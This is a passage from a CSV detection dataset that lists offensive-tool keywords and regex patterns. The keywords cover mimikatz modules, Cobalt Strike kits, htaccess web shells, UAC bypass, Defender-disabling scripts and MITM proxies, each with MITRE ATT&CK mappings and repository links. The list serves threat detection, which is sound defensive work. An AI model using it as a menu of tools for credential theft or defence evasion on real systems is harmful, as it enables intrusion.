keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::regedit*",".{0,1000}misc\:\:regedit.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::sccm*",".{0,1000}misc\:\:sccm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::shadowcopies*",".{0,1000}misc\:\:shadowcopies.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::skeleton*",".{0,1000}misc\:\:skeleton.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::spooler*",".{0,1000}misc\:\:spooler.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::taskmgr*",".{0,1000}misc\:\:taskmgr.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::wp*",".{0,1000}misc\:\:wp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::xor*",".{0,1000}misc\:\:xor.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*MISC_HIJACKABLE_DLL*",".{0,1000}MISC_HIJACKABLE_DLL.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*miscbackdoorlnkhelp*",".{0,1000}miscbackdoorlnkhelp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*missile-command.txt*",".{0,1000}missile\-command\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MisterDaneel/pysoxy*",".{0,1000}MisterDaneel\/pysoxy.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*MitchHS/DLL-Spoofer*",".{0,1000}MitchHS\/DLL\-Spoofer.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" "*mitchmoser/SharpShares*",".{0,1000}mitchmoser\/SharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET 
Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/mitchmoser/SharpShares","1","1","N/A","9","3","296","45","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z" "*mitm6 --*",".{0,1000}mitm6\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*mitm6 -d *",".{0,1000}mitm6\s\-d\s.{0,1000}","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1611","237","2024-02-20T16:11:53Z","2018-01-10T21:27:28Z" "*mitm6.py*",".{0,1000}mitm6\.py.{0,1000}","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1611","237","2024-02-20T16:11:53Z","2018-01-10T21:27:28Z" "*mitmdump -*",".{0,1000}mitmdump\s\-.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*mitmdump -s 
aerosol.py*",".{0,1000}mitmdump\s\-s\saerosol\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*mitmdump*",".{0,1000}mitmdump.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","command-line version of mitmproxy","10","10","34405","3897","2024-04-29T11:28:51Z","2010-02-16T04:10:13Z" "*MITMf.py*",".{0,1000}MITMf\.py.{0,1000}","offensive_tool_keyword","MITMf","Framework for Man-In-The-Middle attacks","T1557 - T1192 - T1173 - T1185","TA0001 - TA0011 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/MITMf","1","1","N/A","N/A","10","3528","1057","2018-08-28T15:44:25Z","2014-07-07T11:13:51Z" "*mitmproxy*",".{0,1000}mitmproxy.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. 
SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","N/A","10","10","34405","3897","2024-04-29T11:28:51Z","2010-02-16T04:10:13Z" "*mitmproxy.rb*",".{0,1000}mitmproxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*mitmsocks*",".{0,1000}mitmsocks.{0,1000}","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","0","N/A","N/A","1","33","11","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" "*mitmsocks4j*",".{0,1000}mitmsocks4j.{0,1000}","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy for Java","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","1","N/A","N/A","1","33","11","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" "*mitmweb*",".{0,1000}mitmweb.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. 
SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","web-based interface for mitmproxy","10","10","34405","3897","2024-04-29T11:28:51Z","2010-02-16T04:10:13Z" "*MlCGkaacS5SRUOt*",".{0,1000}MlCGkaacS5SRUOt.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*Mobile-Security-Framework*",".{0,1000}Mobile\-Security\-Framework.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","10","16345","3116","2024-04-14T13:09:49Z","2015-01-31T04:36:01Z" "*Mobile-Security-Framework*",".{0,1000}Mobile\-Security\-Framework.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. 
malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","16345","3116","2024-04-14T13:09:49Z","2015-01-31T04:36:01Z" "*moc.tnetnocresubuhtig.war//:sptth*",".{0,1000}moc\.tnetnocresubuhtig\.war\/\/\:sptth.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*MockDirUACBypass*",".{0,1000}MockDirUACBypass.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*MockDirUACBypassDll*",".{0,1000}MockDirUACBypassDll.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*Mockingjay_BOF.sln*",".{0,1000}Mockingjay_BOF\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*Mockingjay_BOF-main*",".{0,1000}Mockingjay_BOF\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*mod_auth_remote.phish.htaccess*",".{0,1000}mod_auth_remote\.phish\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_buster.py*",".{0,1000}mod_buster\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*mod_caucho.shell.htaccess*",".{0,1000}mod_caucho\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.bash.htaccess*",".{0,1000}mod_cgi\.shell\.bash\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.bind.htaccess*",".{0,1000}mod_cgi\.shell\.bind\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.windows.htaccess*",".{0,1000}mod_cgi\.shell\.windows\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_mono.shell.htaccess*",".{0,1000}mod_mono\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_multi.shell.htaccess*",".{0,1000}mod_multi\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_nikto.py*",".{0,1000}mod_nikto\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*mod_perl.embperl.shell.htaccess*",".{0,1000}mod_perl\.embperl\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.IPP.shell.htaccess*",".{0,1000}mod_perl\.IPP\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.Mason.shell.htaccess*",".{0,1000}mod_perl\.Mason\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.shell.htaccess*",".{0,1000}mod_perl\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_php.shell.htaccess*",".{0,1000}mod_php\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_php.shell2.htaccess*",".{0,1000}mod_php\.shell2\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_php.stealth-shell.htaccess*",".{0,1000}mod_php\.stealth\-shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_python.shell.htaccess*",".{0,1000}mod_python\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_rivet.shell.htaccess*",".{0,1000}mod_rivet\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_ruby.shell.htaccess*",".{0,1000}mod_ruby\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_sendmail.rce.htaccess*",".{0,1000}mod_sendmail\.rce\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_shellshock.py*",".{0,1000}mod_shellshock\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web 
Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*mod_wp_enum.py*",".{0,1000}mod_wp_enum\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*modDetective*",".{0,1000}modDetective.{0,1000}","offensive_tool_keyword","modDetective","modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.","T1003 - T1036 - T1057","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/itsKindred/modDetective","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--mode 3 --type handshake --essid * --verbose -d dicts/* --read 